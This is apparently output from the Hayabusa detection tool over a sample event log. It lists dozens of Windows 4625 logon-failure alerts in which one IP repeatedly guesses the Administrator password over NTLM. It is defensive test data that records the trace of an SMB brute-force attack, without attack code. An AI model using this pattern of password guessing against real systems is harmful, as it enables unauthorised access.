2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qHs8Z8XPLg58jZ1u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i6kRLlJt3Oxwhdgq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s4kTwriHAKVsTqzB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jfitpZ5ZrzBfpNf6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NdcU6ypEEeIAugGI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jIMfGIU1pHasO88g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MHsxKEQK7CWSqprp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QkC70klP6mv8YZrN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v3YM3zaZk64qqq7K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mOLbk23zOqQLZYZU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v0tlyXqvCQJVqaB5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: npjQlHcGls5gENng  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7buinUqketmW3Ib6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Rs5gYGs6JBf2yV1J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 67hYMvtmbrmv5LHn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gtV42zBnWwRCLfJS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jnaPNm28FvbFfM8L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oCEvKO14gPFHAZIA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iJJyXCm1YOI2uIAS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MNAScx4qMKxCJQdU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BKTHsNA29ZnPHCHQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CjvAb3sjN0PM8my4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wYQ6HuRSMh8DXzMf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SZgejUxgojDE1kR3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2L4yO411OUnkRGWQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O3mGCNGFML75P7w4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6CBslPz31UACz0wR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F4Y8V0wB6unpmFXA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aXSbx81GD6dYgHtv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dWbnppJfJ0Ll9oLW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eoUjizV5iXImPGTe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HHNG9oylnT46IObg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1LUeAisNPQULjD2t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2sB5MlRw4Ox1OWdN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3WaklWtKd8QByH8M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Nzvyy6CUk43SVxZW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xeolvnD92qP1dJPO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KDvRwPbu6yQH2pEf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vxKdofXKKkCLn2n6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IkO9p50Q9iFolbmb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p01SZCA784xmPMe2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XKaI3FHBbBXvVsES  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mmUk6sW8QreDIZZ5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k0w9SSWaaTX7chM9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 46vgsyX5Wxn2rupf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PV8628a8GNKoFyzM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mksBFEFzkC08dB4o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U6QlHT6Bp63JDehd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tRj4fxcRY0Esegl6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dj6zQjZwGEBo0zNt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: imfY1T2VMoaqDSUd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qvPP8UYn9fLpRYl4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rFTGQ5tzNI5k58cK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F8Zj3g1WiTLx8OlJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x2Lr6j8Qt4xEmZZF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BeDRsguCovO47lKm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KqrDyaFTewMPSzD9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nBVMAki1Ghpknf6p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pXKhNUmBUQBTyeNM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d1g9TVwsweaBfZgE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kWymb6ucohaBB60b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LjL0zwlZofVuWhGC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nxsdzkJdnaZs5eKL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PR6EpKvbqMeoQlKI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OZ3LMTtsVNI1gRO2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 75bNeXwYSZPhJdJ7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lH6TVXSqJb1qLd3t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: edDWye6c2UhKznR6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AxKUl1lynGY1ectn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vI5yUgukPBVRorJI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MmR29QcBKMGVQ8rB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b7luV5GfiT0v0h7D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yA7pIDFgQbLIInqs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
